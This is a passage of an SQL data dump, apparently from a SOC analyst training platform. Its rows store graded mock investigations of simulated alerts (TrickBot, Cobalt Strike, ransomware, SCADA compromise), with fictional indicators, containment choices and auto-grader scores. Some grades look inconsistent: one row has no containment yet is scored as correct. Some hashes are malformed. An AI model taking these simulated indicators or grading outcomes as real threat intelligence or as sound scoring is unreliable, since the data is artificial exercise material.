response actions (2/3)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:55:01', '2026-02-28 21:00:00', 0, NULL),
(345, 210, 680, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.30.5\",\"ip-192.168.30.10\",\"artifact_2\"],\"selectedActions\":[\"close_alert\",\"collect_forensics\",\"isolate_host\"],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/26/2026, 5:00:09 PM\\nALERT: Innocuous User Activity Mistaken for Attack\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 192.168.30.5\\n- [IP] 192.168.30.10\\n- [USERNAME] jane.doe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Collect Forensics\\n- Close (No Action)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-26T22:00:13.714Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Artifact analysis completed (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-26 21:57:30', '2026-02-28 21:00:00', 0, NULL),
(346, 189, 290, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"hash-3f0a2f5e\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:28:12 AM\\nALERT: TrickBot Malware Execution [OP: Operation Black Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [HASH] 3f0a2f5e4d3a9b5c7f6e9df123456789\\n- [IP] 34.210.123.158\\n- [FILENAME] trickbot.exe\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-27T02:28:30.484Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:24:38', '2026-02-28 21:00:00', 0, NULL),
(347, 189, 291, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.15\",\"ip-203.0.113.45\",\"hash-e99a18c4\",\"cmd-1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:31:48 AM\\nALERT: Persistence Mechanism Identified [OP: Operation Black Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.15\\n- [IP] 203.0.113.45\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [COMMAND] \\\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\trickbot.exe\\\" --silent\\n- [FILENAME] trickbot.exe\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-27T02:32:05.023Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:28:30', '2026-02-28 21:00:00', 0, NULL),
(348, 189, 292, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-193.161.35.75\",\"ip-10.10.15.23\",\"hash-b1946ac9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:37:43 AM\\nALERT: Cobalt Strike Beacon Detected [OP: Operation Black Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 193.161.35.75\\n- [IP] 10.10.15.23\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [FILENAME] beacon.exe\\n- [USERNAME] janedoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-02-27T02:37:57.252Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:32:05', '2026-02-28 21:00:00', 0, NULL),
(349, 189, 293, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.23\",\"hash-a3f5d6e8\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:45:38 AM\\nALERT: Ransomware Encryption Initiated [OP: Operation Black Harvest]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 198.51.100.23\\n- [HASH] a3f5d6e8b9c2d4a1e9f8b6c4d5e9a2b3\\n- [IP] 10.0.0.25\\n- [FILENAME] patient_records.dat\\n- [USERNAME] hospital_admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\nOn Windows 10, enable cloud-delivered protection and Attack Surface Reduction (ASR) rules to block the execution of files that resemble ransomware.[163] In AWS environments, create an IAM policy to restrict or block the use of SSE-C on S3 buckets\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-02-27T02:46:10.646Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:37:57', '2026-02-28 21:00:00', 0, NULL),
(350, 189, 294, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:49:36 AM\\nALERT: Initial Access via Spear Phishing Campaign [OP: Operation Golden Ticket]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (3)\\n----------------\\n- [IP] 203.0.113.45\\n- [EMAIL] it-security@bank.com\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED:Amadou MANE\",\"submitted_at\":\"2026-02-27T02:49:49.789Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:46:32', '2026-02-28 21:00:00', 0, NULL),
(351, 189, 295, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.10.45\",\"ip-203.0.113.15\",\"cmd-1\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:51:13 AM\\nALERT: Malware Execution and Credential Harvesting [OP: Operation Golden Ticket]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.10.45\\n- [IP] 203.0.113.15\\n- [COMMAND] C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\credential_harvester.exe\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [FILENAME] credential_harvester.exe\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-27T02:51:25.909Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:49:49', '2026-02-28 21:00:00', 0, NULL),
(352, 189, 296, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.2.15\",\"ip-203.0.113.45\",\"hash-e99a18c4\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:54:36 AM\\nALERT: Lateral Movement through Network Exploitation [OP: Operation Golden Ticket]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.2.15\\n- [IP] 203.0.113.45\\n- [HASH] e99a18c428cb38d5f260853678922e03\\n- [USERNAME] jdoe_admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-27T02:54:51.331Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:51:25', '2026-02-28 21:00:00', 0, NULL),
(353, 189, 297, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.25\",\"hash-4e5b6c7d\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:57:27 AM\\nALERT: Manipulation of ATM Withdrawal Limits and SWIFT Gateway [OP: Operation Golden Ticket]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.25\\n- [HASH] 4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\\n- [USERNAME] jdoe_admin\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: AMADOU MANE\",\"submitted_at\":\"2026-02-27T02:57:42.725Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:54:51', '2026-02-28 21:00:00', 0, NULL),
(354, 189, 304, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.25\",\"domain-http://malic\",\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/4/2026, 2:45:49 AM\\nALERT: Spear Phishing Email Detected [OP: Operation Desert Mirage]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.25\\n- [DOMAIN] http://maliciousdomain.com/securelogin\\n- [EMAIL] finance.partner@maliciousdomain.com\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (0)\\n------------------------------\\n(No active containment measures)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Amadou MANE\",\"submitted_at\":\"2026-03-04T01:46:47.206Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 02:57:56', '2026-03-04 01:46:47', 0, NULL),
(355, 209, 1285, 'investigating', NULL, NULL, NULL, NULL, '2026-02-27 07:14:49', '2026-02-27 04:05:49', '2026-02-27 04:05:49', 0, NULL),
(356, 214, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-27 06:14:06', '2026-02-27 06:14:06', 0, NULL),
(357, 196, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 2:57:07 PM\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-27T06:57:22.400Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 06:52:53', '2026-02-28 21:00:00', 0, NULL),
(358, 196, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 2:59:20 PM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-27T06:59:24.541Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 06:57:22', '2026-02-28 21:00:00', 0, NULL),
(359, 196, 270, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:01:57 PM\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Block File Hash\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-27T07:01:59.915Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/6)\",\"missed_items\":[\"block_ip\",\"reset_credentials\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 06:59:24', '2026-02-28 21:00:00', 0, NULL),
(360, 196, 271, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.101\",\"ip-10.0.0.5\",\"hash-5f4dcc3b\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:04:49 PM\\nALERT: Lateral Movement to OT Network [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.101\\n- [IP] 10.0.0.5\\n- [HASH] 5f4dcc3b5aa765d61d8327deb882cf99\\n- [USERNAME] jdoe\\n- [IP] 203.0.113.55\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (5)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-27T07:04:52.460Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 07:01:59', '2026-02-28 21:00:00', 0, NULL),
(361, 196, 272, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.105\",\"ip-10.0.0.20\",\"hash-5d41402a\",\"artifact_2\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 2/27/2026, 3:06:35 PM\\nALERT: SCADA System Compromise [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (6)\\n----------------\\n- [IP] 192.168.1.105\\n- [IP] 10.0.0.20\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [IP] 203.0.113.45\\n- [FILENAME] malicious_script.sh\\n- [USERNAME] unauthorized_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-02-27T07:06:44.821Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-02-27 07:04:52', '2026-02-28 21:00:00', 0, NULL),
(362, 196, 274, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-02-27 07:06:58', '2026-02-27 07:06:58', 0, NULL),
(363, 217, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-01 03:17:30', '2026-03-01 03:17:30', 0, NULL),
(364, 223, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-01 15:51:16', '2026-03-01 15:51:16', 0, NULL),
(365, 224, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-01 15:54:55', '2026-03-01 15:54:55', 0, NULL),
(366, 225, 268, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 02/03/2026, 4:24:24 pm\\nALERT: Phishing Email Detected [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.100\\n- [IP] 10.0.0.15\\n- [IP] 203.0.113.45\\n- [EMAIL] abc123@example.com\\n- [HASH] 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-02T05:24:48.736Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-02 01:00:00', '2026-03-02 05:24:48', 0, NULL),
(367, 225, 269, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"reset_credentials\",\"block_ip\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 02/03/2026, 4:27:24 pm\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-02T05:27:39.111Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-02 05:24:48', '2026-03-02 05:27:39', 0, NULL),
(368, 226, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-02 05:27:10', '2026-03-02 05:27:10', 0, NULL),
(369, 225, 270, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 02/03/2026, 4:28:57 pm\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-02T05:29:01.620Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-02 05:27:39', '2026-03-02 05:29:01', 0, NULL),
